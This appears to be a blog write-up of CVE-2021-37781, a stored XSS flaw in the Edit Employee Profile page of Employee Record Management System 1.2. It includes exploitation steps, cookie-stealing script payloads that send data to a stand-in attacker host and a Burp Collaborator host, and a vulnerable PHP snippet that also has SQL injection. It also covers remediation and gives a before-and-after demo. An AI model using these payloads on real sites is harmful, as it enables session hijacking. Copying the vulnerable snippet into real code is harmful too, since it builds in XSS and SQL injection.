In today’s post, we'll take a close look at CVE-2021-37781: a Cross Site Scripting (XSS) vulnerability in version 1.2 of the Employee Record Management System (ERMS). We’ll see how this vulnerability in the editempprofile.php page allows attackers to inject malicious scripts and compromise users, including practical code examples and some hands-on exploit details.
- Affected file: editempprofile.php
- Affected version: Employee Record Management System (ERMS) 1.2
- CVE ID: CVE-2021-37781 (the official CVE entry is listed in the references below)
How Does the Vulnerability Work?
The heart of the problem is that user-supplied data is neither sanitized nor escaped before it is output on the Edit Employee Profile page. Any user with the right access, or even just a visitor if the form is reachable without a login, can store HTML or JavaScript in fields that are later displayed, so the script runs in the browser of whoever opens that page. Because the payload is saved with the record and replayed on every view, this is a stored XSS, and it can lead to session hijacking, phishing, or account compromise.
Imagine the following snippet (simplified for clarity) from editempprofile.php:
<?php
// ... database connection ...
$id = $_GET['id'];                                    // untrusted: taken straight from the query string
$query = "SELECT * FROM employees WHERE id = '$id'";   // interpolated into SQL, no prepared statement
$result = mysqli_query($conn, $query);
$row = mysqli_fetch_assoc($result);
?>
<form method="POST">
<!-- the stored name is echoed into a quoted attribute with no escaping -->
Name: <input type="text" name="name" value="<?php echo $row['name']; ?>">
<!-- more fields ... -->
<input type="submit" value="Update">
</form>
Notice that <?php echo $row['name']; ?> writes the value of name into the HTML without any escaping. Because the value lands inside a double-quoted attribute, a value that begins with "> closes the attribute and the <input> tag, and everything after it is parsed as fresh markup.
If an attacker manages to store a value like <script>alert('XSS');</script> in the name field, the script runs whenever an admin opens the profile edit page.
Step by step, the attack looks like this:
1. The attacker opens the Edit Employee Profile form and enters a payload such as <script>alert('This is XSS!');</script> into the name field.
2. They submit the form, and the application stores the value unescaped.
3. Now, whenever anyone (including administrators) views the edit page for this record, the injected script runs in their browser.
4. The attacker can replace alert('This is XSS!') with any malicious JavaScript, such as code that steals session cookies.
Sample payload to steal a cookie (exfiltrating to a server the attacker controls):
<script>fetch('https://evil.site?cookie='+document.cookie)</script>
The same payload pointed at a Burp Collaborator host, which is convenient during a test because the callback shows up in the Collaborator client:
<script>fetch('https://burpcollaborator.net/?c='+document.cookie)</script>
Two checks worth making before relying on this payload: if the session cookie is flagged HttpOnly, document.cookie will not contain it (the script still runs inside the victim's session and can issue requests as them, so the impact is not gone, only the cookie theft), and if a Content Security Policy restricts connect-src, the fetch to the attacker's host is blocked.
Remediation
1. Escape output with htmlspecialchars() on every user-controlled field before it reaches the page. For the name field:
<input type="text" name="name" value="<?php echo htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8'); ?>">
ENT_QUOTES matters: without it a single quote is left untouched, which is enough to break out of a single-quoted attribute. htmlspecialchars() is the right encoder for HTML body text and quoted attributes only; a value placed inside a <script> block, an event handler, or a URL needs the encoding for that context.
2. Use prepared statements. The snippet above also interpolates $_GET['id'] directly into the SQL query, so the same page needs parameter binding, not just output escaping.
3. Employ a Content Security Policy (CSP) as defense in depth. A policy that disallows inline scripts keeps an injected <script> from executing even if an escaping bug slips through.
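To make the before and after concrete for both the exploit walkthrough and the fix above, here is an added example (my own code, not part of ERMS or the original post) that renders the name field the vulnerable way and the hardened way from the PHP CLI, adds the reflection check a tester would run on the response body, and shows the prepared-statement lookup for the id. The function names, the constructed payload, and the assumed open mysqli connection $conn are all this example's own.

```php
<?php
// Added example, not code from the ERMS project: the page's vulnerable
// render of the name field beside a hardened version, run from the CLI
// (php xss_demo.php) against a constructed payload so the difference is
// visible without a database. Function and variable names are this
// example's own.

// Constructed sample input: what the attacker typed into the name field.
// It closes the value attribute and the <input> tag, injects a script,
// then opens a dummy <input> to swallow the template's trailing ">.
$storedName = '"><script>alert(\'This is XSS!\');</script><input value="';

// Vulnerable (mirrors the page's snippet): the stored value is dropped into
// the HTML attribute untouched.
function renderNameFieldVulnerable(string $name): string
{
    return 'Name: <input type="text" name="name" value="' . $name . '">';
}

// Hardened: htmlspecialchars() with ENT_QUOTES so both " and ' are encoded.
// That matters here because the value sits inside a double-quoted attribute;
// ENT_SUBSTITUTE keeps invalid UTF-8 from making the function return "".
function renderNameFieldSafe(string $name): string
{
    $escaped = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return 'Name: <input type="text" name="name" value="' . $escaped . '">';
}

// The check a tester runs on the response body after submitting the form:
// does the raw payload come back verbatim (vulnerable), or only in its
// entity-encoded form (fixed)?
function isReflectedUnescaped(string $html, string $payload): bool
{
    return strpos($html, $payload) !== false;
}

// The page's snippet also interpolates $_GET['id'] straight into SQL.
// A prepared statement keeps the id as data. $conn is assumed to be an
// open mysqli connection to the ERMS database (not created in this demo).
function fetchEmployee(mysqli $conn, string $id): ?array
{
    $stmt = $conn->prepare('SELECT * FROM employees WHERE id = ?');
    $stmt->bind_param('s', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

$vulnerable = renderNameFieldVulnerable($storedName);
$safe       = renderNameFieldSafe($storedName);

echo "Vulnerable output:\n$vulnerable\n\n";
echo "Hardened output:\n$safe\n\n";
printf("Payload reflected unescaped (vulnerable): %s\n",
    isReflectedUnescaped($vulnerable, $storedName) ? 'yes' : 'no');
printf("Payload reflected unescaped (hardened):   %s\n",
    isReflectedUnescaped($safe, $storedName) ? 'yes' : 'no');
```

In the vulnerable output the browser sees a closed <input>, a live <script> element, and a second stray <input>; in the hardened output every quote and angle bracket is an entity, so the whole payload stays inside the attribute as inert text. The same isReflectedUnescaped check, run against a real response from editempprofile.php after submitting the form, is a quick way to confirm whether the fix has actually been deployed.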
References
- CVE-2021-37781
- Exploit-DB entry #50200
- OWASP Cross Site Scripting (XSS) Explained
Conclusion
CVE-2021-37781 may seem trivial at first—it only deals with one profile field—but as we’ve seen, the impact can be critical. Always treat user input as untrusted, sanitize and escape data, and review any page that outputs database content to the browser.
Stay safe and secure your applications!
Do you have questions or want to see more exploit writeups? Drop a comment below!
Timeline
Published on: 10/28/2022 15:15:00 UTC
Last modified on: 10/28/2022 18:32:00 UTC